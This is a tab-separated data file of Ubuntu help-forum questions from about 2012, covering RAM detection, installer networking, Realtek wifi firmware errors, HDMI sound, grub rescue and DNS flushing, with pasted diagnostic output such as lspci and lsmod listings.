187842	64 bit ubuntu sees half my ram	this is on my amd fx ( tm ) -4100 quad-core processor ( according to /proc/cpuinfo ) on a machine with two 4gb ram dimms . bios shows 8gb ram installed . any help would be appreciated . ram : extreme performance sector 5 g series 8gb ddr3-1333 ( pc3-1066 ) enhanced latency dual channel desktop memory kit ( two 4gb memory modules ) mb : ga-78lmt-s2p socket am3+ 760g matx amd motherboard cpu : fx 4100 black edition 3.6ghz quad-core socket am3+ boxed processor here 's what the software says : $ free total used free shared buffers cached mem : 3515100 3293656 221444 0 19260 2670352 -/+ buffers/cache : 604044 2911056 swap : 3650556 90916 3559640 $ uname -a linux mythbuntu 3.2.0-30-generic # 48-ubuntu smp fri aug 24 16:52:48 utc 2012 x86_64 x86_64 x86_64 gnu/linux from lshw : *-memory description : system memory physical id : 20 slot : system board or motherboard size : 4gib *-bank:0 description : dimm 1066 mhz ( 0.9 ns ) product : none vendor : none physical id : 0 serial : none slot : a0 size : 2gib width : 64 bits clock : 1066mhz ( 0.9ns ) *-bank:1 description : dimm 1066 mhz ( 0.9 ns ) product : none vendor : none physical id : 1 serial : none slot : a1 size : 2gib width : 64 bits clock : 1066mhz ( 0.9ns )
187843	the installer does not detect network	i downloaded the installation image , right to the flash drive , then boot from it . i choose install ubuntu , and in the next window , described three recommended conditions , the last-established connection to the internet . so , i close with this condition the red x , that is , installer does not see a network . but if i choose try ubuntu , the connection is established and firefox opens the page . i am connecting to the internet via a network card . what is the problem , and how can i get the installation to connect to the internet ? p.s . distribution - ubuntu 12.04 ( also tried kubuntu 12.04 , ubuntu 12.10 beta1 - the result is the same )
187844	problems with run from usb installation creation and lack of option to run from usb	i wanted to use and try ubuntu from a usb flash drive so i used the universal usb installer from pendrivelinux . i selected ubuntu-12.04.1-alternate-amd64.iso since i have a 64bit processor on an hp 2760p . i saw no other 64bit choices . when i booted from the usb drive , the only alternatives pertaining to running the os were `` install '' and `` rescue ... '' . there was no alternative to `` try '' the os from the usb drive . i was afraid to choose install for fear it would ruin my windows installation . what should i do ? prior to this there were other problems . if i downloaded an iso version of linux and tried to select it from its download directory , the usb installer would not display any `` iso '' versions in that directory even though the open window indicated it was filtering for those files . as much as i loved an installation of linux i got to play with some years back , i 'm ready to give up and stick to windows despite all of its problems . it makes the basics , like installation , easy for anyone . ca n't install it , ca n't use it . i 'm an engineer and i ca n't get linux or the usb universal installer to work as directed . i 'd love to dual-boot windows and linux however i understand the boot loader can get corrupted and needs to be reinstalled . that would not be a problem if it can be easily done from a cd or especially from a small , handy usb stick . well if i ca n't trust the most trusted pen drive installer to work properly ie . ca n't filter or display files properly , how can i trust a boot-loader repair program . i 'd really love to use linux . any advice ?
187853	why wifi no longer works 12.04.1 ?	starting this morning over wifi ( realtek rtl8188ce ) on clevo w253hu . may be due to the update before yesterday , more pilot managed , but somehow it worked yesterday . if someone has an idea of the problem . back command lines : cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts '' lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 006 : id 192f:0416 avago technologies , pte . bus 002 device 004 : id 5986:0315 acer , inc lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) 03:00.0 ethernet controller : jmicron technology corp. jmc250 pci express gigabit ethernet controller ( rev 05 ) 03:00.1 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 90 ) 03:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 90 ) 03:00.3 system peripheral : jmicron technology corp. ms host controller ( rev 90 ) lspci -nn | grep -i net 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8176 ] ( rev 01 ) 03:00.0 ethernet controller [ 0200 ] : jmicron technology corp. jmc250 pci express gigabit ethernet controller [ 197b:0250 ] ( rev 05 ) lspci -k 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) subsystem : clevo/kapok computer device 4140 kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) subsystem : clevo/kapok computer device 4140 kernel driver in use : i915 kernel modules : i915 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) subsystem : clevo/kapok computer device 4140 kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) subsystem : clevo/kapok computer device 4140 kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) subsystem : clevo/kapok computer device 4140 kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) subsystem : clevo/kapok computer device 4140 kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) subsystem : clevo/kapok computer device 4140 kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) subsystem : clevo/kapok computer device 4140 kernel driver in use : ahci 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) subsystem : clevo/kapok computer device 4140 kernel modules : i2c-i801 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device 9196 kernel modules : rtl8192ce 03:00.0 ethernet controller : jmicron technology corp. jmc250 pci express gigabit ethernet controller ( rev 05 ) subsystem : clevo/kapok computer device 4140 kernel driver in use : jme kernel modules : jme 03:00.1 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 90 ) subsystem : clevo/kapok computer device 4140 kernel driver in use : sdhci-pci kernel modules : sdhci-pci 03:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 90 ) subsystem : clevo/kapok computer device 4140 kernel modules : sdhci-pci 03:00.3 system peripheral : jmicron technology corp. ms host controller ( rev 90 ) subsystem : clevo/kapok computer device 4140 kernel driver in use : jmb38x_ms kernel modules : jmb38x_ms sudo lshw -c network *-network non-réclamé description : network controller produit : rtl8188ce 802.11b/g/n wifi adapter fabriquant : realtek semiconductor co. , ltd. identifiant matériel : 0 information bus : pci @ 0000:02:00.0 version : 01 bits : 64 bits horloge : 33mhz fonctionnalités : pm msi pciexpress cap_list configuration : latency=0 ressources : porte/s : e000 ( taille=256 ) mémoire : f7d00000-f7d03fff *-network description : ethernet interface produit : jmc250 pci express gigabit ethernet controller fabriquant : jmicron technology corp. identifiant matériel : 0 information bus : pci @ 0000:03:00.0 nom logique : eth0 version : 05 numéro de série : 00:90 : f5 : c1 : c6:45 taille : 100mbit/s capacité : 1gbit/s bits : 32 bits horloge : 33mhz fonctionnalités : pm pciexpress msix msi bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=jme driverversion=1.0.8 duplex=full ip=192.168.1.54 latency=0 link=yes multicast=yes port=mii speed=100mbit/s ressources : irq:44 mémoire : f7c20000-f7c23fff porte/s : d100 ( taille=128 ) porte/s : d000 ( taille=256 ) mémoire : f7c10000-f7c1ffff mémoire : f7c00000-f7c0ffff lsmod module size used by btusb 18288 0 rfcomm 47604 0 bnep 18281 2 bluetooth 180104 11 btusb , rfcomm , bnep parport_pc 32866 0 ppdev 17113 0 binfmt_misc 17540 1 snd_hda_codec_realtek 224173 0 dm_crypt 23125 0 snd_hda_codec_hdmi 32474 0 uvcvideo 72627 0 videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev snd_hda_intel 33773 2 snd_hda_codec 127706 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi jmb38x_ms 17646 0 psmouse 87692 0 serio_raw 13211 0 memstick 16569 1 jmb38x_ms snd_seq_midi_event 14899 1 snd_seq_midi rtl8192ce 84826 0 rtl8192c_common 75767 1 rtl8192ce rtlwifi 111202 1 rtl8192ce snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq mac80211 506816 3 rtl8192ce , rtl8192c_common , rtlwifi mac_hid 13253 0 snd 78855 14 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device cfg80211 205544 2 rtlwifi , mac80211 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm mei 41616 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp usbhid 47199 0 hid 99559 1 usbhid i915 473035 3 drm_kms_helper 46978 1 i915 drm 242038 4 i915 , drm_kms_helper jme 41259 0 i2c_algo_bit 13423 1 i915 sdhci_pci 18826 0 sdhci 33205 1 sdhci_pci wmi 19256 0 video 19596 1 i915 iwconfig lo no wireless extensions . eth0 no wireless extensions . ifconfig eth0 link encap : ethernet hwaddr 00:90 : f5 : c1 : c6:45 inet adr:192.168.1.54 bcast:192.168.1.255 masque:255.255.255.0 adr inet6 : fe80 : :290 : f5ff : fec1 : c645/64 scope : lien up broadcast running multicast mtu:1500 metric:1 packets reçus:4513 erreurs:0 :0 overruns:0 frame:0 tx packets:4359 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:3471675 ( 3.4 mb ) octets transmis:712722 ( 712.7 kb ) interruption:44 lo link encap : boucle locale inet adr:127.0.0.1 masque:255.0.0.0 adr inet6 : : :1/128 scope : hôte up loopback running mtu:16436 metric:1 packets reçus:686 erreurs:0 :0 overruns:0 frame:0 tx packets:686 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:0 octets reçus:64556 ( 64.5 kb ) octets transmis:64556 ( 64.5 kb ) sudo iwlist scan lo interface does n't support scanning . eth0 interface does n't support scanning . uname -r -m 3.2.0-30-generic x86_64 cat /etc/network/interfaces auto lo iface lo inet loopback nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ connexion filaire 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : wired driver : jme state : connected default : yes hw address : 00:90 : f5 : c1 : c6:45 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.54 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 sudo rfkill listrfkill list 1 : hci0 : bluetooth soft blocked : no hard blocked : no the absence of line `` kernel driver in use : '' the return of lspci-k made ​​me think that it is not loaded yet but he seems to be . lsmod | grep rtl8192ce rtl8192ce 137478 0 rtlwifi 118749 1 rtl8192ce mac80211 506816 2 rtl8192ce , rtlwifi i found something disturbing in / var / log / syslog sep 14 11:40:11 pcroger kernel : [ 64.048783 ] rtl8192ce-0 : rtl92c_init_sw_vars ( ) : < 0-0 > failed to request firmware ! sep 14 11:40:11 pcroger kernel : [ 64.048795 ] rtlwifi-0 : rtl_pci_probe ( ) : < 0-0 > ca n't init_sw_vars . sep 14 11:40:11 pcroger kernel : [ 64.048835 ] rtl8192ce 0000:02:00.0 : pci int a disabled sep 14 11:40:11 pcroger kernel : [ 64.943345 ] ata1.00 : exception emask 0x0 sact 0x7fffffff serr 0x0 action 0x6 frozen sep 14 11:40:11 pcroger kernel : [ 64.943358 ] ata1.00 : failed command : read fpdma queued sep 14 11:40:11 pcroger kernel : [ 64.943371 ] ata1.00 : cmd 60/00:00:00:68:6a/04:00:0b:00:00/40 tag 0 ncq 524288 in sep 14 11:40:11 pcroger kernel : [ 64.943374 ] res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x4 ( timeout ) sep 14 11:40:11 pcroger kernel : [ 64.943381 ] ata1.00 : status : { drdy } ubuntu and takes forever to start ( 2 min ) .
187854	hptouchsmart 610 - no sound from my ps3 - ubuntu 12.04	as my hard drive crashed in my touchsmart 610 - i reinstalled my system on a linux external hdd - but since then when i plug in my ps3 via hdmi to the touchsmart i have no sound . the image from the ps3 is however working in hd perfectly fine as i have tried mutliple things already i am starting to be annoyed by this . the sound works perfectly on the computer itself ( music , movies etc ) but only not from the ps3 . when i run alsamixer i do not see however any hdmi port active . please help - i am an absolutely newbie to linux . ah . of course . it is ubuntu 12.04 here is the detail of my graphic card - as i heard this may help - and somewhere below the details of the sound . olaf @ olaf-touchsmart-600 : ~ $ lspci -v lspci : command not found olaf @ olaf-touchsmart-600 : ~ $ lspci -v 00:00.0 host bridge : intel corporation core processor dram controller ( rev 12 ) subsystem : hewlett-packard company device 2a9a flags : bus master , fast devsel , latency 0 capabilities : 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 12 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : fa000000-fbcfffff prefetchable memory behind bridge : 00000000ce000000-00000000dfffffff capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) subsystem : hewlett-packard company device 2a9a flags : bus master , fast devsel , latency 0 , irq 46 memory at f9fffc00 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 2a9a flags : bus master , medium devsel , latency 0 , irq 16 memory at f9ffc000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) subsystem : hewlett-packard company device 2a9a flags : bus master , fast devsel , latency 0 , irq 47 memory at f9ff8000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : fbd00000-fbdfffff prefetchable memory behind bridge : 00000000c0200000-00000000c03fffff capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 00001000-00001fff memory behind bridge : fbe00000-fbefffff prefetchable memory behind bridge : 00000000c0000000-00000000c01fffff capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : fbf00000-fbffffff prefetchable memory behind bridge : 00000000f8f00000-00000000f8ffffff capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 2a9a flags : bus master , medium devsel , latency 0 , irq 23 memory at f9ff6000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=32 capabilities : 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) subsystem : hewlett-packard company device 2a9a flags : bus master , medium devsel , latency 0 capabilities : kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : hewlett-packard company device 2a9a flags : bus master , 66mhz , medium devsel , latency 0 , irq 44 i/o ports at cc00 [ size=8 ] i/o ports at c880 [ size=4 ] i/o ports at c800 [ size=8 ] i/o ports at c480 [ size=4 ] i/o ports at c400 [ size=32 ] memory at f9ff4000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : kernel driver in use : ahci 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) subsystem : hewlett-packard company device 2a9a flags : medium devsel , irq 7 memory at f9fff800 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at 0400 [ size=32 ] kernel modules : i2c-i801 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) subsystem : hewlett-packard company device 2a9a flags : bus master , fast devsel , latency 0 , irq 18 memory at f9ffe000 ( 64-bit , non-prefetchable ) [ size=4k ] capabilities : kernel modules : intel_ips 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 230m ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : device 1b0a:903b flags : bus master , fast devsel , latency 0 , irq 16 memory at fa000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at ce000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at dc00 [ size=128 ] [ virtual ] expansion rom at fbc80000 [ disabled ] [ size=512k ] capabilities : kernel driver in use : nvidia kernel modules : nvidia_current_updates , nvidia , nouveau , nvidiafb 02:00.0 network controller : ralink corp. rt3092 wireless 802.11n 2t/2r pcie subsystem : device 15a9:0015 flags : bus master , fast devsel , latency 0 , irq 16 memory at fbdf0000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : kernel driver in use : rt2800pci kernel modules : rt2800pci 03:00.0 multimedia video controller : nec corporation device 0165 ( rev 0b ) subsystem : avermedia technologies inc device 650b flags : bus master , fast devsel , latency 0 , irq 5 memory at fbefe000 ( 64-bit , non-prefetchable ) [ size=8k ] memory at fbefd800 ( 64-bit , non-prefetchable ) [ size=2k ] capabilities : 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) subsystem : hewlett-packard company device 2a9a flags : bus master , fast devsel , latency 0 , irq 45 i/o ports at e800 [ size=256 ] memory at fbfff000 ( 64-bit , non-prefetchable ) [ size=4k ] memory at f8ffc000 ( 64-bit , prefetchable ) [ size=16k ] expansion rom at fbfc0000 [ disabled ] [ size=128k ] capabilities : kernel driver in use : r8169 kernel modules : r8169 here is the detail of the sound setting olaf @ olaf-touchsmart-600 : ~ $ lspci -v lspci : command not found olaf @ olaf-touchsmart-600 : ~ $ lspci -v 00:00.0 host bridge : intel corporation core processor dram controller ( rev 12 ) subsystem : hewlett-packard company device 2a9a flags : bus master , fast devsel , latency 0 capabilities : 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 12 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : fa000000-fbcfffff prefetchable memory behind bridge : 00000000ce000000-00000000dfffffff capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) subsystem : hewlett-packard company device 2a9a flags : bus master , fast devsel , latency 0 , irq 46 memory at f9fffc00 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 2a9a flags : bus master , medium devsel , latency 0 , irq 16 memory at f9ffc000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) subsystem : hewlett-packard company device 2a9a flags : bus master , fast devsel , latency 0 , irq 47 memory at f9ff8000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : fbd00000-fbdfffff prefetchable memory behind bridge : 00000000c0200000-00000000c03fffff capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 00001000-00001fff memory behind bridge : fbe00000-fbefffff prefetchable memory behind bridge : 00000000c0000000-00000000c01fffff capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : fbf00000-fbffffff prefetchable memory behind bridge : 00000000f8f00000-00000000f8ffffff capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 2a9a flags : bus master , medium devsel , latency 0 , irq 23 memory at f9ff6000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=32 capabilities : 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) subsystem : hewlett-packard company device 2a9a flags : bus master , medium devsel , latency 0 capabilities : kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : hewlett-packard company device 2a9a flags : bus master , 66mhz , medium devsel , latency 0 , irq 44 i/o ports at cc00 [ size=8 ] i/o ports at c880 [ size=4 ] i/o ports at c800 [ size=8 ] i/o ports at c480 [ size=4 ] i/o ports at c400 [ size=32 ] memory at f9ff4000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : kernel driver in use : ahci 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) subsystem : hewlett-packard company device 2a9a flags : medium devsel , irq 7 memory at f9fff800 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at 0400 [ size=32 ] kernel modules : i2c-i801 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) subsystem : hewlett-packard company device 2a9a flags : bus master , fast devsel , latency 0 , irq 18 memory at f9ffe000 ( 64-bit , non-prefetchable ) [ size=4k ] capabilities : kernel modules : intel_ips 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 230m ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : device 1b0a:903b flags : bus master , fast devsel , latency 0 , irq 16 memory at fa000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at ce000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at dc00 [ size=128 ] [ virtual ] expansion rom at fbc80000 [ disabled ] [ size=512k ] capabilities : kernel driver in use : nvidia kernel modules : nvidia_current_updates , nvidia , nouveau , nvidiafb 02:00.0 network controller : ralink corp. rt3092 wireless 802.11n 2t/2r pcie subsystem : device 15a9:0015 flags : bus master , fast devsel , latency 0 , irq 16 memory at fbdf0000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : kernel driver in use : rt2800pci kernel modules : rt2800pci 03:00.0 multimedia video controller : nec corporation device 0165 ( rev 0b ) subsystem : avermedia technologies inc device 650b flags : bus master , fast devsel , latency 0 , irq 5 memory at fbefe000 ( 64-bit , non-prefetchable ) [ size=8k ] memory at fbefd800 ( 64-bit , non-prefetchable ) [ size=2k ] capabilities : 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) subsystem : hewlett-packard company device 2a9a flags : bus master , fast devsel , latency 0 , irq 45 i/o ports at e800 [ size=256 ] memory at fbfff000 ( 64-bit , non-prefetchable ) [ size=4k ] memory at f8ffc000 ( 64-bit , prefetchable ) [ size=16k ] expansion rom at fbfc0000 [ disabled ] [ size=128k ] capabilities : kernel driver in use : r8169 kernel modules : r8169 olaf @ olaf-touchsmart-600 : ~ $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc888 analog [ alc888 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc888 digital [ alc888 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0
187858	damaged powerpc iso ?	i have an imac g4 onto which i am trying to install ubuntu 12.4.1 . but every time i download the image , i get a message warning that the image might be damaged . is this a problem with the image or with osx ? if it 's a problem with the image , is there an image out there that is n't damaged that will run on an imac g4 powerpc ?
187860	how can i swap the z and y keys on the keyboard ?	most of the time i use the us qwerty layout but from time to time i also have to use the german layout which is qwertz and it is very annoying . how can i swap the y and z keys on the german layout ? the solution was at this link : custom keyboard layout in ubuntu ( or just linux : ) kindly provided by gertvdijk in his answer .
187861	how do i flush dns settings in ubuntu , like we do in windows ?	i am having some issues with my internet . the isp wants me to reset/flush the dns settings . so my question is how do i flush the dns settings on ubuntu like we do in windows with ipconfig/flushdns . any help , would be highly appreciated .
187862	after update , get `` error : file not found . '' followed by `` grub rescue > _ ''	i just installed quite a lot of 12.10 updates , was prompted to reboot , and then found that i could n't boot .
187864	is there any way to synchronize flash audio and video ?	i 've tried to search , but nothing works . my flash audio is always out of sync . it 's in all browsers . i 'm using ubuntu 12.04 32bit and alsa without pulseaudio . thanks
187866	can i download & install the wallpapers from 12.10 on 12.04.1 ?	i was googling regarding ubuntu 12.10 ( quantal quetzal ) ; pretty much liked the wallpapers . just out of curiosity , can i install the wallpapers from a higher release ( 12.10 ) on a previous release precise ( 12.04.1 ) without upgrading to 12.10 . i have tried the following : - ankit @ stream : ~ $ sudo apt-get install ubuntu-wallpapers-quantal [ sudo ] password for ankit : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ubuntu-wallpapers-quantal i have followed this post ; but this for installing wallpapers from previous releases on the current release . any ideas how can this be achieved .
